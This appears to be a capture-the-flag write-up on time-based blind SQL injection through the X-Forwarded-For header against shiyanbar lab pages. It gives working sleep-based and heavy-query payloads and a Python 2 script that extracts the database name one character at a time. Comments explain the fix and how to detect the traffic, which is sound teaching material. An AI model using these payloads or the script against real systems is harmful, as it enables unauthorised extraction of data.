基于时间的盲注
- 127.0.0.1' and (select case when ascii(substring((select database()) from 1 for 1))<128 then sleep(4) else 1 end) or '1
基于时间的盲注
http://ctf5.shiyanbar.com/web/wonderkun/index.php
http://ctf5.shiyanbar.com/web/baocuo/index.php
注入点：X-Forwarded-For 请求头（该请求头由客户端控制，服务端应将其视为不可信输入，并通过参数化查询使用）
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1' and sleep(3) or '1
X-Forwarded-For: 127.0.0.1' and (select case when ascii(substring((select database()) from 1 for 1))=119 then sleep(6) else 1 end ) or '1
Python 脚本（Python 2 语法）:
import requests
# NOTE(review): the pasted listing lost its indentation; the nesting below is
# inferred from the statement order -- confirm against the original file.
# The syntax is Python 2 (xrange, print statement, "except X, e").
#
# Purpose: recover the current database name from the CTF lab endpoint one
# character at a time, using response latency as the only signal.
#
# Defender's reading: this only works if the application copies the
# client-supplied X-Forwarded-For header into a SQL statement by string
# concatenation (presumably when recording the client IP -- not visible here).
# Binding the header as a query parameter, or validating it as an IP address
# before use, closes the hole. The traffic is also distinctive for detection:
# SQL keywords such as "select" or "sleep(" inside X-Forwarded-For, and a
# burst of requests where most return quickly and a few stall for a fixed
# interval.
url='http://ctf5.shiyanbar.com/web/wonderkun/index.php'
# Candidate characters tried at each position of the name.
dic='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_@#$%^&*()'
# Characters confirmed so far.
flag=''
# Positions 1..49 (SQL substring positions are 1-based).
for i in xrange(1,50):
    for x in dic:
        # The header value carries a CASE expression: the server sleeps 6 s
        # only when the character at position i of database() equals x.
        headers={"X-Forwarded-For":"x' + (select case when substring((select database()) from %d for 1)='%s' then sleep(6) else 1 end ) or '1" %(i,x)}
        try:
            # timeout=6 matches the sleep(6) above, so a delayed response
            # surfaces as ReadTimeout; the response body (res) is never read.
            res=requests.get(url,headers=headers,timeout=6)
        except requests.exceptions.ReadTimeout,e:
            # A read timeout is taken as "guess was right". Ordinary network
            # latency can land here too, so a single run is not reliable.
            flag=flag+x
            print flag
            break
# Final value after all positions have been tried.
print flag
baocuo 题目（上面第二个 URL）使用的参数:
username=0' || /*
&password=*/ if((select value from ffll44jj) regexp '^fl',(select count(*) from information_schema.columns A,information_schema.columns B, information_schema.columns C),0) or '0